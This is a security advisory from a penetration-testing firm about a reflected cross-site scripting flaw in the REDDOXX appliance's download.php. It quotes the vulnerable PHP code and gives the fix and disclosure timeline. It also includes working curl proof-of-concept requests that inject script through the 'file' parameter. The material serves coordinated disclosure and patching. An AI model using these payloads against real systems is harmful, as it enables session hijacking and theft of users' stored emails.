REDDOXX Appliance Cross Site Scripting

2017-07-24T00:00:00
ID PACKETSTORM:143468
Type packetstorm
Reporter redteam-pentesting.de
Modified 2017-07-24T00:00:00

Description

                                        
                                            `Advisory: Cross-Site Scripting in REDDOXX Appliance  
  
RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability  
in the REDDOXX appliance software, which allows attackers to inject  
arbitrary JavaScript code via a crafted URL.  
  
  
Details  
=======  
  
Product: REDDOXX Appliance  
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too  
Fixed Versions: Version 2032 SP2  
Vulnerability Type: Cross-Site Scripting  
Security Risk: high  
Vendor URL: https://www.reddoxx.com/  
Vendor Status: patch available  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-003  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"REDDOXX is a leading supplier of solutions for e-mail archiving,  
encrypted and digitally signed e-mail traffic as well as spam  
protection. Our focus is on technological innovation: taking our cue  
from our clientsa requirements our competent and quality-conscious  
employees strive to offer you the best possible products at all times.  
Using stringent quality standards and proven processes we keep  
developing our company and products continuously, with the goal of  
continuous improvement."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
The REDDOXX appliance [0] contains a PHP script called download.php. It  
is available at http://www.example.com/download.php in normal  
installations and resides at /opt/reddoxx/local/htdocs/download.php on  
the local filesystem of the appliance. Through the ISO provided on  
the vendor's homepage [1], it was possible to analyze this file and any  
other file in a typical REDDOXX appliance installation.  
  
The file contains the following source code (shortened to the relevant  
sections):  
  
------------------------------------------------------------------------  
<?php  
[...]  
  
// For MD 2.0  
$fileName = $_GET['file'];  
  
[...]  
  
// For MD 2.0  
if ($fileName <> '') {  
$file = $fileName;  
$fileID = basename($fileName);  
}  
  
// Currently we only allow downloads from session directories  
if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) &&  
(strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) {  
die('File is not in session directory: ' . $file);  
}  
  
if(!file_exists($file))  
{  
// File doesn't exist, output error  
die('File not found: ' . $file);  
}  
else  
{  
[...]  
}  
?>  
------------------------------------------------------------------------  
  
The script expects a URL parameter called "file" and stores its value in  
the variable $fileName. The value of this variable is then copied to the  
variable $file, which undergoes two different checks: First, the  
function strpos() is used to check whether a certain substring is  
contained in the value of the variable. The second check uses the function  
file_exists() to determine whether the file specified in the variable is  
present in the filesystem. If either of these checks fail, the value of  
the variable $file, which is controlled by the attacker via the URL  
parameter, is embedded unencoded into an error message which is returned  
to the user with a content-type of "text/html".  
  
  
Proof of Concept  
================  
  
The following curl command-lines can be used to trigger the  
vulnerability at both locations of the PHP script:  
  
------------------------------------------------------------------------  
$ curl --include 'http://www.example.com/download.php?file='\  
'<script>alert("RedTeam%20Pentesting")</script>'  
HTTP/1.1 200 OK  
[...]  
Content-Length: 78  
Content-Type: text/html  
  
File is not in session directory: <script>alert("RedTeam Pentesting")</script>  
------------------------------------------------------------------------  
  
------------------------------------------------------------------------  
$ curl --include 'http://www.example.com/download.php?file='\  
'<script>alert("RedTeam%20Pentesting")</script><!--/opt/reddoxx/wi/Sessions/-->'  
HTTP/1.1 200 OK  
[...]  
Content-Length: 92  
Content-Type: text/html  
  
File not found: <script>alert("RedTeam Pentesting")</script><!--/opt/reddoxx/wi/Sessions/-->  
------------------------------------------------------------------------  
  
In both cases, the response containing the error messages is returned  
with the Content-Type header set to "text/html", causing the browser  
to execute the injected JavaScript code.  
  
The same functionality is vulnerable to an arbitrary file disclosure  
attack as described in rt-sa-2017-004 [2] and indicated by the second  
curl command.  
  
  
Workaround  
==========  
  
None  
  
  
Fix  
===  
  
Update the appliance software to Version 2032 SP2.  
  
  
Security Risk  
=============  
  
The vulnerability allows attackers to extract user's emails from the  
REDDOXX appliance. However, as a session ID stored in the DOM of the  
website is used for authentication rather than cookies, the attacked  
user must first log in. Once attackers have access to the user's session  
ID, the victim's browser can be instrumented to retrieve emails stored  
in the system and send them to a system under the attacker's control.  
The vulnerability is therefore rated as a high risk.  
  
  
Timeline  
========  
  
2017-05-16 Vulnerability identified  
2017-05-23 Customer approved disclosure of vulnerability  
2017-05-26 Customer provided details of vulnerability to vendor  
2017-06-21 Vulnerability reported as fixed by vendor  
2017-07-24 Advisory released  
  
  
References  
==========  
  
[0] https://www.reddoxx.com/en/  
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads  
(Requires login)  
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting GmbH is looking for more penetration testers to join  
our team. If you are interested in working for RedTeam Pentesting in  
Aachen, please visit the respective section of our website.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
GeschA$?ftsfA1/4hrer: Patrick Hof, Jens Liebchen  
`